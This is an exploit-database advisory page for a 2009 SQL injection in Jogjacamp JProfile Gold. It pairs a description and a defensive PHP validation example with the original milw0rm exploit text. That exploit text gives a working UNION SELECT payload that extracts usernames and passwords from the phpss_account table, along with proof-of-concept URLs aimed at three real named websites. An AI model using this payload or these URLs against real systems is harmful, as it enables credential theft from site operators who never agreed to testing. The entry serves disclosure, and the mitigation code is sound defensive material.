Vendor: JProfile Gold
By: kecemplungkalen
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: JProfile Gold
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Jogjacamp JProfile Gold SQL Injection

A SQL injection vulnerability exists in Jogjacamp JProfile Gold, which allows an attacker to execute arbitrary SQL commands via the 'id_news' parameter in a 'news.detail' action to the 'index.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
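
One way to apply this mitigation to the 'id_news' parameter, as an added example that is not JProfile Gold's own code: the value is accepted only as a positive integer and is then bound as a query parameter instead of being concatenated into the SQL text. The `news` table, its columns and both function names are assumptions, and an in-memory SQLite database stands in for the site's database.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: return id_news as a positive integer,
// or null when the raw request value is anything else.
function parse_news_id(mixed $raw): ?int
{
    if (!is_string($raw)) {
        return null; // missing values and arrays (id_news[]=1) are rejected
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hypothetical helper: look up one news row with a bound integer parameter.
// Table and column names are assumed, not taken from the product.
function fetch_news(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id_news, title, body FROM news WHERE id_news = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (id_news INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO news VALUES (6, 'Constructed headline', 'Constructed body')");

// Constructed inputs: a valid id, an unknown id, and values that are not
// plain positive integers (including one with trailing SQL text).
foreach (['6', '7', '6 union select 1,2,3 --', '', '-1'] as $raw) {
    $id = parse_news_id($raw);
    if ($id === null) {
        // Fail closed before any SQL is built; the application would send HTTP 400.
        echo 'rejected: ' . json_encode($raw) . "\n";
        continue;
    }
    $row = fetch_news($db, $id);
    echo $row !== null ? "found: {$row['title']}\n" : "not found: {$id}\n";
}
```

Validation alone narrows what reaches the query; the bound parameter is what keeps the value from ever being parsed as SQL, so the two are used together here.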

Exploit-DB raw data:

###############################################################

     __                                                   
    |__|__ ________   ____     ___________   ______  _  __
    |  |  |  \____ \_/ __ \  _/ ___\_  __ \_/ __ \ \/ \/ /
    |  |  |  /  |_> >  ___/  \  \___|  | \/\  ___/\     / 
/\__|  |____/|   __/ \___  >  \___  >__|    \___  >\/\_/  
\______|     |__|        \/       \/            \/        



###############################################################


Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen 

Vendor  : http://jogjacamp.com

bugs	: /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC	: http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

	  http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

	  http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################

greetz	: Allah
	  s3t4n and Paman aka Jack-
	  my family
	  and all Mainhack BrotherHood 
	  jupe crew, stop playing games all the time :p

# milw0rm.com [2009-03-03]